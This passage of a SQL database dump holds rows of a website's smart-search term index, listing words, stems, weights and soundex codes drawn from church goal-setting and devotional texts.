(312847, 'equivalent to 6', 'equival to 6', 0, 1, 1.5, 'E21453', 1, '*'),
(312848, 'establish', 'establish', 0, 0, 0.6, 'E23142', 1, '*'),
(312849, 'establish an', 'establish an', 0, 1, 1.4, 'E231425', 1, '*'),
(312850, 'establish an ngo', 'establish an ngo', 0, 1, 1.5333, 'E2314252', 1, '*'),
(312851, 'establish at', 'establish at', 0, 1, 1.4, 'E231423', 1, '*'),
(312852, 'establish at least', 'establish at least', 0, 1, 1.6, 'E231423423', 1, '*'),
(312853, 'every dream', 'everi dream', 0, 1, 1.3667, 'E16365', 1, '*'),
(312854, 'every dream centre', 'everi dream centre', 0, 1, 1.6, 'E163652536', 1, '*'),
(312855, 'family 11', 'famili 11', 0, 1, 1.3, 'F540', 1, '*'),
(312856, 'family 11 establish', 'famili 11 establish', 0, 1, 1.6333, 'F5423142', 1, '*'),
(312857, 'family unit', 'famili unit', 0, 1, 1.3667, 'F5453', 1, '*'),
(312858, 'family unit leader', 'famili unit leader', 0, 1, 1.6, 'F5453436', 1, '*'),
(312859, 'finishing', 'finish', 0, 0, 0.6, 'F5252', 1, '*'),
(312860, 'for a fun', 'for a fun', 0, 1, 1.3, 'F615', 1, '*'),
(312861, 'for christ', 'for christ', 0, 1, 1.3333, 'F62623', 1, '*'),
(312862, 'for christ 5', 'for christ 5', 0, 1, 1.4, 'F62623', 1, '*'),
(312863, 'for dream', 'for dream', 0, 1, 1.3, 'F6365', 1, '*'),
(312864, 'for dream centre', 'for dream centre', 0, 1, 1.5333, 'F63652536', 1, '*'),
(312865, 'for your family', 'for your family', 0, 1, 1.5, 'F6154', 1, '*'),
(312866, 'from home', 'from home', 0, 1, 1.3, 'F650', 1, '*'),
(312867, 'from home 13', 'from home 13', 0, 1, 1.4, 'F650', 1, '*'),
(312868, 'from salary', 'from salary', 0, 1, 1.3667, 'F65246', 1, '*'),
(312869, 'from salary current', 'from salary current', 0, 1, 1.6333, 'F652462653', 1, '*'),
(312870, 'fun', 'fun', 0, 0, 0.2, 'F500', 1, '*'),
(312871, 'fun weekend', 'fun weekend', 0, 1, 1.3667, 'F5253', 1, '*'),
(312872, 'fun weekend away', 'fun weekend away', 0, 1, 1.5333, 'F5253', 1, '*'),
(312873, 'genuine reason', 'genuin reason', 0, 1, 1.4667, 'G5625', 1, '*'),
(312874, 'genuine reason 9', 'genuin reason 9', 0, 1, 1.5333, 'G5625', 1, '*'),
(312875, 'have a saving', 'have a saving', 0, 1, 1.4333, 'H12152', 1, '*'),
(312876, 'head quarter', 'head quarter', 0, 1, 1.4, 'H32636', 1, '*'),
(312877, 'head quarter building', 'head quarter building', 0, 1, 1.7, 'H3263614352', 1, '*'),
(312878, 'home 13', 'home 13', 0, 1, 1.2333, 'H500', 1, '*'),
(312879, 'home 13 pray', 'home 13 pray', 0, 1, 1.4, 'H516', 1, '*'),
(312880, 'hour a', 'hour a', 0, 1, 1.2, 'H600', 1, '*'),
(312881, 'hour a day', 'hour a day', 0, 1, 1.3333, 'H630', 1, '*'),
(312882, 'house 2 pay', 'hous 2 pay', 0, 1, 1.3667, 'H210', 1, '*'),
(312883, 'in cash', 'in cash', 0, 1, 1.2333, 'I520', 1, '*'),
(312884, 'in cash and', 'in cash and', 0, 1, 1.3667, 'I5253', 1, '*'),
(312885, 'in kind', 'in kind', 0, 1, 1.2333, 'I5253', 1, '*'),
(312886, 'in kind till', 'in kind till', 0, 1, 1.4, 'I52534', 1, '*'),
(312887, 'in the year', 'in the year', 0, 1, 1.3667, 'I536', 1, '*'),
(312888, 'income apart', 'incom apart', 0, 1, 1.4, 'I525163', 1, '*'),
(312889, 'income apart from', 'incom apart from', 0, 1, 1.5667, 'I525163165', 1, '*'),
(312890, 'influence a', 'influenc a', 0, 1, 1.3667, 'I51452', 1, '*'),
(312891, 'influence a segment', 'influenc a segment', 0, 1, 1.6333, 'I5145253', 1, '*'),
(312892, 'item 54', 'item 54', 0, 1, 1.2333, 'I350', 1, '*'),
(312893, 'item 54 divine', 'item 54 divine', 0, 1, 1.4667, 'I35315', 1, '*'),
(312894, 'kind till', 'kind till', 0, 1, 1.3, 'K534', 1, '*'),
(312895, 'kind till finishing', 'kind till finishing', 0, 1, 1.6333, 'K53415252', 1, '*'),
(312896, 'leader 6', 'leader 6', 0, 1, 1.2667, 'L360', 1, '*'),
(312897, 'leader 6 win', 'leader 6 win', 0, 1, 1.4, 'L365', 1, '*'),
(312898, 'leadership for', 'leadership for', 0, 1, 1.4667, 'L36216', 1, '*'),
(312899, 'leadership for your', 'leadership for your', 0, 1, 1.6333, 'L36216', 1, '*'),
(312900, 'least one', 'least one', 0, 1, 1.3, 'L235', 1, '*'),
(312901, 'least one additional', 'least one additional', 0, 1, 1.6667, 'L235354', 1, '*'),
(312902, 'least one hour', 'least one hour', 0, 1, 1.4667, 'L2356', 1, '*'),
(312903, 'man should', 'man should', 0, 1, 1.3333, 'M243', 1, '*'),
(312904, 'man should 1', 'man should 1', 0, 1, 1.4, 'M243', 1, '*'),
(312905, 'mimmp', 'mimmp', 0, 0, 0.3333, 'M100', 1, '*'),
(312906, 'mimmp this', 'mimmp this', 0, 1, 1.3333, 'M132', 1, '*'),
(312907, 'mimmp this year', 'mimmp this year', 0, 1, 1.5, 'M1326', 1, '*'),
(312908, 'minimum', 'minimum', 0, 0, 0.4667, 'M000', 1, '*'),
(312909, 'minimum of', 'minimum of', 0, 1, 1.3333, 'M100', 1, '*'),
(312910, 'minimum of 12', 'minimum of 12', 0, 1, 1.4333, 'M100', 1, '*'),
(312911, 'miss a', 'miss a', 0, 1, 1.2, 'M200', 1, '*'),
(312912, 'miss a bible', 'miss a bible', 0, 1, 1.4, 'M214', 1, '*'),
(312913, 'miss a tithe', 'miss a tithe', 0, 1, 1.4, 'M230', 1, '*'),
(312914, 'months\'', 'month', 0, 0, 0.4667, 'M320', 1, '*'),
(312915, 'months\' salary', 'month salary', 0, 1, 1.4667, 'M3246', 1, '*'),
(312916, 'ngo', 'ngo', 0, 0, 0.2, 'N200', 1, '*'),
(312917, 'ngo to', 'ngo to', 0, 1, 1.2, 'N230', 1, '*'),
(312918, 'ngo to influence', 'ngo to influence', 0, 1, 1.5333, 'N2351452', 1, '*'),
(312919, 'of 12', 'of 12', 0, 1, 1.1667, 'O100', 1, '*'),
(312920, 'of 12 souls', 'of 12 souls', 0, 1, 1.3667, 'O1242', 1, '*'),
(312921, 'of head', 'of head', 0, 1, 1.2333, 'O130', 1, '*'),
(312922, 'of head quarter', 'of head quarter', 0, 1, 1.5, 'O132636', 1, '*'),
(312923, 'of income apart', 'of income apart', 0, 1, 1.5, 'O1525163', 1, '*'),
(312924, 'of the society', 'of the society', 0, 1, 1.4667, 'O1323', 1, '*'),
(312925, 'off all', 'off all', 0, 1, 1.2333, 'O140', 1, '*'),
(312926, 'off all debts', 'off all debts', 0, 1, 1.4333, 'O143132', 1, '*'),
(312927, 'one additional', 'on additional', 0, 1, 1.4667, 'O5354', 1, '*'),
(312928, 'one additional stream', 'on additional stream', 0, 1, 1.7, 'O53542365', 1, '*'),
(312929, 'one hour', 'on hour', 0, 1, 1.2667, 'O560', 1, '*'),
(312930, 'one hour a', 'on hour a', 0, 1, 1.3333, 'O560', 1, '*'),
(312931, 'out for a', 'out for a', 0, 1, 1.3, 'O316', 1, '*'),
(312932, 'part of head', 'part of head', 0, 1, 1.4, 'P6313', 1, '*'),
(312933, 'pay off', 'pai off', 0, 1, 1.2333, 'P000', 1, '*'),
(312934, 'pay off all', 'pai off all', 0, 1, 1.3667, 'P400', 1, '*'),
(312935, 'personally to', 'person to', 0, 1, 1.4333, 'P62543', 1, '*'),
(312936, 'personally to christ', 'person to christ', 0, 1, 1.6667, 'P625432623', 1, '*'),
(312937, 'pray at', 'prai at', 0, 1, 1.2333, 'P630', 1, '*'),
(312938, 'pray at least', 'prai at least', 0, 1, 1.4333, 'P63423', 1, '*'),
(312939, 'provide', 'provid', 0, 0, 0.4667, 'P613', 2, '*'),
(312940, 'provide quality', 'provid quality', 0, 1, 1.5, 'P613243', 1, '*'),
(312941, 'provide quality leadership', 'provid quality leadership', 0, 1, 1.8667, 'P61324343621', 1, '*'),
(312942, 'quality', 'qualiti', 0, 0, 0.4667, 'Q430', 1, '*'),
(312943, 'quality leadership', 'qualiti leadership', 0, 1, 1.6, 'Q4343621', 1, '*'),
(312944, 'quality leadership for', 'qualiti leadership for', 0, 1, 1.7333, 'Q43436216', 1, '*'),
(312945, 'quarter building', 'quarter building', 0, 1, 1.5333, 'Q63614352', 1, '*'),
(312946, 'quarter building in', 'quarter building in', 0, 1, 1.6333, 'Q636143525', 1, '*'),
(312947, 'read through', 'read through', 0, 1, 1.4, 'R362', 1, '*'),
(312948, 'read through the', 'read through the', 0, 1, 1.5333, 'R3623', 1, '*'),
(312949, 'reason 9', 'reason 9', 0, 1, 1.2667, 'R250', 1, '*'),
(312950, 'reason 9 attend', 'reason 9 attend', 0, 1, 1.5, 'R25353', 1, '*'),
(312951, 'salary current', 'salari current', 0, 1, 1.4667, 'S462653', 1, '*'),
(312952, 'salary current source', 'salari current source', 0, 1, 1.7, 'S462653262', 1, '*'),
(312953, 'saving', 'save', 0, 0, 0.4, 'S152', 1, '*'),
(312954, 'saving equivalent', 'save equivalent', 0, 1, 1.5667, 'S1521453', 1, '*'),
(312955, 'saving equivalent to', 'save equivalent to', 0, 1, 1.6667, 'S1521453', 1, '*'),
(312956, 'segment', 'segment', 0, 0, 0.4667, 'S530', 1, '*'),
(312957, 'segment of', 'segment of', 0, 1, 1.3333, 'S531', 1, '*'),
(312958, 'segment of the', 'segment of the', 0, 1, 1.4667, 'S5313', 1, '*'),
(312959, 'service in', 'servic in', 0, 1, 1.3333, 'S6125', 1, '*'),
(312960, 'service in the', 'servic in the', 0, 1, 1.4667, 'S61253', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(312961, 'services 10', 'servic 10', 0, 1, 1.3667, 'S612', 1, '*'),
(312962, 'services 10 provide', 'servic 10 provide', 0, 1, 1.6333, 'S6121613', 1, '*'),
(312963, 'should 1', 'should 1', 0, 1, 1.2667, 'S430', 1, '*'),
(312964, 'should 1 build', 'should 1 build', 0, 1, 1.4667, 'S43143', 1, '*'),
(312965, 'skill', 'skill', 0, 0, 0.3333, 'S400', 1, '*'),
(312966, 'skill this', 'skill this', 0, 1, 1.3333, 'S432', 1, '*'),
(312967, 'skill this year', 'skill this year', 0, 1, 1.5, 'S4326', 1, '*'),
(312968, 'society', 'societi', 0, 0, 0.4667, 'S300', 1, '*'),
(312969, 'society for', 'societi for', 0, 1, 1.3667, 'S316', 1, '*'),
(312970, 'society for christ', 'societi for christ', 0, 1, 1.6, 'S3162623', 1, '*'),
(312971, 'souls personally', 'soul personally', 0, 1, 1.5333, 'S4216254', 1, '*'),
(312972, 'souls personally to', 'soul personally to', 0, 1, 1.6333, 'S42162543', 1, '*'),
(312973, 'source 12', 'sourc 12', 0, 1, 1.3, 'S620', 1, '*'),
(312974, 'source 12 take', 'sourc 12 take', 0, 1, 1.4667, 'S6232', 1, '*'),
(312975, 'spouse', 'spous', 0, 0, 0.4, 'S120', 1, '*'),
(312976, 'spouse out', 'spous out', 0, 1, 1.3333, 'S123', 1, '*'),
(312977, 'spouse out for', 'spous out for', 0, 1, 1.4667, 'S12316', 1, '*'),
(312978, 'stream', 'stream', 0, 0, 0.4, 'S365', 1, '*'),
(312979, 'stream of', 'stream of', 0, 1, 1.3, 'S3651', 1, '*'),
(312980, 'stream of income', 'stream of income', 0, 1, 1.5333, 'S3651525', 1, '*'),
(312981, 'study service', 'studi service', 0, 1, 1.4333, 'S32612', 1, '*'),
(312982, 'study service in', 'studi service in', 0, 1, 1.5333, 'S326125', 1, '*'),
(312983, 'sunday services', 'sundai services', 0, 1, 1.5, 'S532612', 1, '*'),
(312984, 'sunday services 10', 'sundai services 10', 0, 1, 1.6, 'S532612', 1, '*'),
(312985, 'take your spouse', 'take your spouse', 0, 1, 1.5333, 'T26212', 1, '*'),
(312986, 'the bible in', 'the bible in', 0, 1, 1.4, 'T145', 1, '*'),
(312987, 'the society', 'the society', 0, 1, 1.3667, 'T230', 1, '*'),
(312988, 'the society for', 'the society for', 0, 1, 1.5, 'T2316', 1, '*'),
(312989, 'the year 15', 'the year 15', 0, 1, 1.3667, 'T600', 1, '*'),
(312990, 'the year and', 'the year and', 0, 1, 1.4, 'T653', 1, '*'),
(312991, 'the year without', 'the year without', 0, 1, 1.5333, 'T630', 1, '*'),
(312992, 'their house', 'their house', 0, 1, 1.3667, 'T620', 1, '*'),
(312993, 'their house 2', 'their house 2', 0, 1, 1.4333, 'T620', 1, '*'),
(312994, 'this year 17', 'thi year 17', 0, 1, 1.4, 'T260', 1, '*'),
(312995, 'this year 8', 'thi year 8', 0, 1, 1.3667, 'T260', 1, '*'),
(312996, 'till finishing', 'till finishing', 0, 1, 1.4667, 'T415252', 1, '*'),
(312997, 'tithe 16', 'tith 16', 0, 1, 1.2667, 'T000', 1, '*'),
(312998, 'tithe 16 acquire', 'tith 16 acquire', 0, 1, 1.5333, 'T260', 1, '*'),
(312999, 'to 6', 'to 6', 0, 1, 1.1333, 'T000', 1, '*'),
(313000, 'to 6 months\'', 'to 6 months', 0, 1, 1.4, 'T532', 1, '*'),
(313001, 'to church 7', 'to church 7', 0, 1, 1.3667, 'T262', 1, '*'),
(313002, 'to influence', 'to influence', 0, 1, 1.4, 'T51452', 2, '*'),
(313003, 'to influence a', 'to influence a', 0, 1, 1.4667, 'T51452', 1, '*'),
(313004, 'unit', 'unit', 0, 0, 0.2667, 'U530', 1, '*'),
(313005, 'unit leader', 'unit leader', 0, 1, 1.3667, 'U53436', 1, '*'),
(313006, 'unit leader 6', 'unit leader 6', 0, 1, 1.4333, 'U53436', 1, '*'),
(313007, 'weekend away', 'weekend away', 0, 1, 1.4, 'W253', 1, '*'),
(313008, 'weekend away from', 'weekend away from', 0, 1, 1.5667, 'W253165', 1, '*'),
(313009, 'win a', 'win a', 0, 1, 1.1667, 'W500', 1, '*'),
(313010, 'win a minimum', 'win a minimum', 0, 1, 1.4333, 'W500', 1, '*'),
(313011, 'without a genuine', 'without a genuine', 0, 1, 1.5667, 'W325', 1, '*'),
(313012, 'year 15', 'year 15', 0, 1, 1.2333, 'Y600', 1, '*'),
(313013, 'year 15 don\'t', 'year 15 don', 0, 1, 1.4333, 'Y6353', 1, '*'),
(313014, 'year 17', 'year 17', 0, 1, 1.2333, 'Y600', 1, '*'),
(313015, 'year 17 be', 'year 17 be', 0, 1, 1.3333, 'Y610', 1, '*'),
(313016, 'year 8', 'year 8', 0, 1, 1.2, 'Y600', 1, '*'),
(313017, 'year 8 don\'t', 'year 8 don', 0, 1, 1.4, 'Y6353', 1, '*'),
(313018, 'year and added', 'year and added', 0, 1, 1.4667, 'Y653', 1, '*'),
(313019, 'year without', 'year without', 0, 1, 1.4, 'Y630', 1, '*'),
(313020, 'year without a', 'year without a', 0, 1, 1.4667, 'Y630', 1, '*'),
(313021, 'your family 11', 'your family 11', 0, 1, 1.4667, 'Y6154', 1, '*'),
(313022, 'your spouse', 'your spouse', 0, 1, 1.3667, 'Y6212', 1, '*'),
(313023, 'your spouse out', 'your spouse out', 0, 1, 1.5, 'Y62123', 1, '*'),
(313238, '07', '07', 0, 0, 0.2, '', 2, '*'),
(313239, '07 2017', '07 2017', 0, 1, 1.2333, '', 2, '*'),
(313240, '1 verse 35', '1 verse 35', 0, 1, 1.3333, 'V620', 1, '*'),
(313241, '16 07', '16 07', 0, 1, 1.1667, '', 1, '*'),
(313242, '16 07 2017', '16 07 2017', 0, 1, 1.3333, '', 1, '*'),
(313243, '35 says', '35 says', 0, 1, 1.2333, 'S000', 1, '*'),
(313244, '35 says and', '35 says and', 0, 1, 1.3667, 'S530', 1, '*'),
(313245, '55', '55', 0, 0, 0.2, '', 1, '*'),
(313246, '55 divine', '55 divine', 0, 1, 1.3, 'D150', 1, '*'),
(313247, '55 divine appointment', '55 divine appointment', 0, 1, 1.7, 'D1515353', 1, '*'),
(313248, 'a believer is', 'a believer is', 0, 1, 1.4333, 'A14162', 1, '*'),
(313249, 'a believer the', 'a believer the', 0, 1, 1.4667, 'A14163', 1, '*'),
(313250, 'a dense', 'a dense', 0, 1, 1.2333, 'A352', 1, '*'),
(313251, 'a dense and', 'a dense and', 0, 1, 1.3667, 'A35253', 1, '*'),
(313252, 'a giant of', 'a giant of', 0, 1, 1.3333, 'A2531', 1, '*'),
(313253, 'a great while', 'a great while', 0, 1, 1.4333, 'A2634', 1, '*'),
(313254, 'a personal time', 'a personal time', 0, 1, 1.5, 'A1625435', 1, '*'),
(313255, 'a pulpit', 'a pulpit', 0, 1, 1.2667, 'A1413', 1, '*'),
(313256, 'a pulpit minister', 'a pulpit minister', 0, 1, 1.5667, 'A14135236', 1, '*'),
(313257, 'a solitary', 'a solitary', 0, 1, 1.3333, 'A2436', 1, '*'),
(313258, 'a solitary place', 'a solitary place', 0, 1, 1.5333, 'A2436142', 1, '*'),
(313259, 'achievements', 'achiev', 0, 0, 0.8, 'A21532', 1, '*'),
(313260, 'achievements that', 'achiev that', 0, 1, 1.5667, 'A215323', 1, '*'),
(313261, 'achievements that is', 'achiev that is', 0, 1, 1.6667, 'A2153232', 1, '*'),
(313262, 'advancing', 'advanc', 0, 0, 0.6, 'A315252', 1, '*'),
(313263, 'advancing the', 'advanc the', 0, 1, 1.4333, 'A3152523', 1, '*'),
(313264, 'advancing the course', 'advanc the course', 0, 1, 1.6667, 'A3152523262', 1, '*'),
(313265, 'all of', 'all of', 0, 1, 1.2, 'A410', 1, '*'),
(313266, 'all of them', 'all of them', 0, 1, 1.3667, 'A4135', 1, '*'),
(313267, 'all through the', 'all through the', 0, 1, 1.5, 'A43623', 1, '*'),
(313268, 'alone all', 'alon all', 0, 1, 1.3, 'A454', 1, '*'),
(313269, 'alone all through', 'alon all through', 0, 1, 1.5667, 'A454362', 1, '*'),
(313270, 'alone either', 'alon either', 0, 1, 1.4, 'A4536', 1, '*'),
(313271, 'alone either deep', 'alon either deep', 0, 1, 1.5667, 'A453631', 1, '*'),
(313272, 'an anointing that', 'an anointing that', 0, 1, 1.5667, 'A53523', 1, '*'),
(313273, 'and achievements', 'and achievements', 0, 1, 1.5333, 'A5321532', 1, '*'),
(313274, 'and achievements that', 'and achievements that', 0, 1, 1.7, 'A53215323', 1, '*'),
(313275, 'and bible', 'and bible', 0, 1, 1.3, 'A5314', 1, '*'),
(313276, 'and bible study', 'and bible study', 0, 1, 1.5, 'A531423', 1, '*'),
(313277, 'and character', 'and character', 0, 1, 1.4333, 'A5326236', 1, '*'),
(313278, 'and character is', 'and character is', 0, 1, 1.5333, 'A53262362', 1, '*'),
(313279, 'and consistently', 'and consistently', 0, 1, 1.5333, 'A532523534', 1, '*'),
(313280, 'and consistently fellowship', 'and consistently fellowship', 0, 1, 1.9, 'A5325235341421', 1, '*'),
(313281, 'and departed', 'and departed', 0, 1, 1.4, 'A53163', 1, '*'),
(313282, 'and departed into', 'and departed into', 0, 1, 1.5667, 'A5316353', 1, '*'),
(313283, 'and destiny mark', 'and destiny mark', 0, 1, 1.5333, 'A5323562', 1, '*'),
(313284, 'and experiences than', 'and experiences than', 0, 1, 1.6667, 'A532165235', 1, '*'),
(313285, 'and fellowship', 'and fellowship', 0, 1, 1.4667, 'A531421', 1, '*'),
(313286, 'and fellowship with', 'and fellowship with', 0, 1, 1.6333, 'A5314213', 1, '*'),
(313287, 'and irreplaceable', 'and irreplaceable', 0, 1, 1.5667, 'A53614214', 1, '*'),
(313288, 'and irreplaceable need', 'and irreplaceable need', 0, 1, 1.7333, 'A5361421453', 1, '*'),
(313289, 'and private', 'and private', 0, 1, 1.3667, 'A531613', 1, '*'),
(313290, 'and private meditation', 'and private meditation', 0, 1, 1.7333, 'A531613535', 1, '*'),
(313291, 'and the enemy', 'and the enemy', 0, 1, 1.4333, 'A535', 1, '*'),
(313292, 'and there prayed”.', 'and there prayed”.', 0, 1, 1.6, 'A536163', 1, '*'),
(313293, 'and weak', 'and weak', 0, 1, 1.2667, 'A532', 1, '*'),
(313294, 'and weak christian', 'and weak christian', 0, 1, 1.6, 'A5326235', 1, '*'),
(313295, 'anointing that', 'anoint that', 0, 1, 1.4667, 'A53523', 1, '*'),
(313296, 'anointing that comes', 'anoint that comes', 0, 1, 1.6667, 'A53523252', 1, '*'),
(313297, 'anointing the', 'anoint the', 0, 1, 1.4333, 'A53523', 2, '*'),
(313298, 'anointing the busier', 'anoint the busier', 0, 1, 1.6667, 'A53523126', 1, '*'),
(313299, 'anyone who', 'anyon who', 0, 1, 1.3333, 'A500', 1, '*'),
(313300, 'anyone who trivializes', 'anyon who trivializes', 0, 1, 1.7333, 'A536142', 1, '*'),
(313301, 'appointment', 'appoint', 0, 0, 0.7333, 'A15353', 1, '*'),
(313302, 'appointment and', 'appoint and', 0, 1, 1.5, 'A1535353', 1, '*'),
(313303, 'appointment and fellowship', 'appoint and fellowship', 0, 1, 1.8667, 'A15353531421', 1, '*'),
(313304, 'appointment with', 'appoint with', 0, 1, 1.5333, 'A15353', 1, '*'),
(313305, 'appointment with god', 'appoint with god', 0, 1, 1.6667, 'A1535323', 1, '*'),
(313306, 'appointment with the', 'appoint with the', 0, 1, 1.6667, 'A15353', 1, '*'),
(313307, 'appointments', 'appoint', 0, 0, 0.8, 'A153532', 1, '*'),
(313308, 'appointments daily', 'appoint daily', 0, 1, 1.6, 'A15353234', 1, '*'),
(313309, 'appointments daily with', 'appoint daily with', 0, 1, 1.7667, 'A153532343', 1, '*'),
(313310, 'appointments jacob', 'appoint jacob', 0, 1, 1.6, 'A1535321', 1, '*'),
(313311, 'appointments jacob had', 'appoint jacob had', 0, 1, 1.7333, 'A15353213', 1, '*'),
(313312, 'appointments with', 'appoint with', 0, 1, 1.5667, 'A1535323', 1, '*'),
(313313, 'appointments with god', 'appoint with god', 0, 1, 1.7, 'A153532323', 1, '*'),
(313314, 'battle to', 'battl to', 0, 1, 1.3, 'B343', 1, '*'),
(313315, 'battle to keep', 'battl to keep', 0, 1, 1.4667, 'B34321', 1, '*'),
(313316, 'battle you', 'battl you', 0, 1, 1.3333, 'B340', 1, '*'),
(313317, 'battle you will', 'battl you will', 0, 1, 1.5, 'B340', 1, '*'),
(313318, 'be a giant', 'be a giant', 0, 1, 1.3333, 'B253', 1, '*'),
(313319, 'be it', 'be it', 0, 1, 1.1667, 'B300', 1, '*'),
(313320, 'be it a', 'be it a', 0, 1, 1.2333, 'B300', 1, '*'),
(313321, 'be men', 'be men', 0, 1, 1.2, 'B500', 1, '*'),
(313322, 'be men of', 'be men of', 0, 1, 1.3, 'B510', 1, '*'),
(313323, 'be ready for', 'be ready for', 0, 1, 1.4, 'B6316', 1, '*'),
(313324, 'be the battle', 'be the battle', 0, 1, 1.4333, 'B3134', 1, '*'),
(313325, 'beat', 'beat', 0, 0, 0.2667, 'B300', 1, '*'),
(313326, 'beat that', 'beat that', 0, 1, 1.3, 'B300', 1, '*'),
(313327, 'beat that anointing', 'beat that anointing', 0, 1, 1.6333, 'B35352', 1, '*'),
(313328, 'become the', 'becom the', 0, 1, 1.3333, 'B253', 2, '*'),
(313329, 'become the more', 'becom the more', 0, 1, 1.5, 'B25356', 1, '*'),
(313330, 'become undefeatable', 'becom undefeatable', 0, 1, 1.6333, 'B2531314', 1, '*'),
(313331, 'become undefeatable for', 'becom undefeatable for', 0, 1, 1.7667, 'B253131416', 1, '*'),
(313332, 'been consistent', 'been consistent', 0, 1, 1.5, 'B5252353', 1, '*'),
(313333, 'been consistent in', 'been consistent in', 0, 1, 1.6, 'B52523535', 1, '*'),
(313334, 'been responsible', 'been responsible', 0, 1, 1.5333, 'B56215214', 1, '*'),
(313335, 'been responsible for', 'been responsible for', 0, 1, 1.6667, 'B5621521416', 1, '*'),
(313336, 'before day', 'befor day', 0, 1, 1.3333, 'B630', 1, '*'),
(313337, 'before day he', 'befor day he', 0, 1, 1.4333, 'B630', 1, '*'),
(313338, 'before he', 'befor he', 0, 1, 1.3, 'B600', 2, '*'),
(313339, 'before he had', 'befor he had', 0, 1, 1.4333, 'B630', 1, '*'),
(313340, 'believer is', 'believ is', 0, 1, 1.3667, 'B4162', 1, '*'),
(313341, 'believer is not', 'believ is not', 0, 1, 1.5, 'B416253', 1, '*'),
(313342, 'believer the', 'believ the', 0, 1, 1.4, 'B4163', 1, '*'),
(313343, 'believer the greatest', 'believ the greatest', 0, 1, 1.7, 'B416326323', 1, '*'),
(313344, 'beloved keep', 'belov keep', 0, 1, 1.4, 'B41321', 1, '*'),
(313345, 'beloved keep your', 'belov keep your', 0, 1, 1.5667, 'B413216', 1, '*'),
(313346, 'bible study that', 'bibl study that', 0, 1, 1.5333, 'B423', 1, '*'),
(313347, 'both in this', 'both in this', 0, 1, 1.4, 'B3532', 1, '*'),
(313348, 'built in', 'built in', 0, 1, 1.2667, 'B435', 1, '*'),
(313349, 'built in the', 'built in the', 0, 1, 1.4, 'B4353', 1, '*'),
(313350, 'busier', 'busier', 0, 0, 0.4, 'B260', 1, '*'),
(313351, 'busier you', 'busier you', 0, 1, 1.3333, 'B260', 1, '*'),
(313352, 'busier you become', 'busier you become', 0, 1, 1.5667, 'B26125', 1, '*'),
(313353, 'busy during', 'busi during', 0, 1, 1.3667, 'B23652', 1, '*'),
(313354, 'busy during the', 'busi during the', 0, 1, 1.5, 'B236523', 1, '*'),
(313355, 'busy that', 'busi that', 0, 1, 1.3, 'B230', 1, '*'),
(313356, 'busy that you', 'busi that you', 0, 1, 1.4333, 'B230', 1, '*'),
(313357, 'but in character', 'but in character', 0, 1, 1.5333, 'B3526236', 1, '*'),
(313358, 'by giving', 'by giving', 0, 1, 1.3, 'B2152', 1, '*'),
(313359, 'by giving you', 'by giving you', 0, 1, 1.4333, 'B2152', 1, '*'),
(313360, 'can\'t beat', 'can beat', 0, 1, 1.3333, 'C5313', 1, '*'),
(313361, 'can\'t beat that', 'can beat that', 0, 1, 1.5, 'C5313', 1, '*'),
(313362, 'cannot even', 'cannot even', 0, 1, 1.3667, 'C5315', 1, '*'),
(313363, 'cannot even have', 'cannot even have', 0, 1, 1.5333, 'C53151', 1, '*'),
(313364, 'changed his', 'chang his', 0, 1, 1.3667, 'C5232', 1, '*'),
(313365, 'changed his entire', 'chang his entire', 0, 1, 1.6, 'C5232536', 1, '*'),
(313366, 'changes maturity', 'chang maturity', 0, 1, 1.5333, 'C525363', 1, '*'),
(313367, 'changes maturity of', 'chang maturity of', 0, 1, 1.6333, 'C5253631', 1, '*'),
(313368, 'character development', 'charact development', 0, 1, 1.7, 'C6236314153', 1, '*'),
(313369, 'character development and', 'charact development and', 0, 1, 1.8333, 'C623631415353', 1, '*'),
(313370, 'character is', 'charact is', 0, 1, 1.4, 'C62362', 2, '*'),
(313371, 'character is built', 'charact is built', 0, 1, 1.6, 'C62362143', 1, '*'),
(313372, 'christian people', 'christian people', 0, 1, 1.5333, 'C623514', 1, '*'),
(313373, 'christian people who', 'christian people who', 0, 1, 1.6667, 'C623514', 1, '*'),
(313374, 'christian race', 'christian race', 0, 1, 1.4667, 'C623562', 1, '*'),
(313375, 'christian race be', 'christian race be', 0, 1, 1.5667, 'C6235621', 1, '*'),
(313376, 'closet', 'closet', 0, 0, 0.4, 'C423', 1, '*'),
(313377, 'closet with', 'closet with', 0, 1, 1.3667, 'C423', 1, '*'),
(313378, 'closet with the', 'closet with the', 0, 1, 1.5, 'C423', 1, '*'),
(313379, 'come those', 'come those', 0, 1, 1.3333, 'C532', 1, '*'),
(313380, 'come those personal', 'come those personal', 0, 1, 1.6333, 'C53216254', 1, '*'),
(313381, 'comes upon', 'come upon', 0, 1, 1.3333, 'C5215', 1, '*'),
(313382, 'comes upon you', 'come upon you', 0, 1, 1.4667, 'C5215', 1, '*'),
(313383, 'common which', 'common which', 0, 1, 1.4, 'C520', 1, '*'),
(313384, 'common which is', 'common which is', 0, 1, 1.5, 'C520', 1, '*'),
(313385, 'consistent in', 'consist in', 0, 1, 1.4333, 'C523535', 1, '*'),
(313386, 'consistent in the', 'consist in the', 0, 1, 1.5667, 'C5235353', 1, '*'),
(313387, 'consistently fellowship', 'consist fellowship', 0, 1, 1.7667, 'C5235341421', 1, '*'),
(313388, 'consistently fellowship with', 'consist fellowship with', 0, 1, 1.9333, 'C52353414213', 1, '*'),
(313389, 'corporate fellowship', 'corpor fellowship', 0, 1, 1.6667, 'C61631421', 1, '*'),
(313390, 'corporate fellowship however', 'corpor fellowship however', 0, 1, 1.9333, 'C616314216', 1, '*'),
(313391, 'corporate meetings', 'corpor meetings', 0, 1, 1.6, 'C61635352', 1, '*'),
(313392, 'corporate meetings if', 'corpor meetings if', 0, 1, 1.7, 'C616353521', 1, '*'),
(313393, 'course of', 'cours of', 0, 1, 1.3, 'C621', 1, '*'),
(313394, 'course of the', 'cours of the', 0, 1, 1.4333, 'C6213', 1, '*'),
(313395, 'critical appointment', 'critic appointment', 0, 1, 1.6667, 'C632415353', 1, '*'),
(313396, 'critical appointment with', 'critic appointment with', 0, 1, 1.8333, 'C632415353', 1, '*'),
(313397, 'daily with', 'daili with', 0, 1, 1.3333, 'D430', 1, '*'),
(313398, 'daily with god', 'daili with god', 0, 1, 1.4667, 'D4323', 1, '*'),
(313399, 'day he', 'dai he', 0, 1, 1.2, 'D000', 1, '*'),
(313400, 'day he went', 'dai he went', 0, 1, 1.3667, 'D530', 1, '*'),
(313401, 'day is yet', 'dai is yet', 0, 1, 1.3333, 'D230', 1, '*'),
(313402, 'day take', 'dai take', 0, 1, 1.2667, 'D200', 1, '*'),
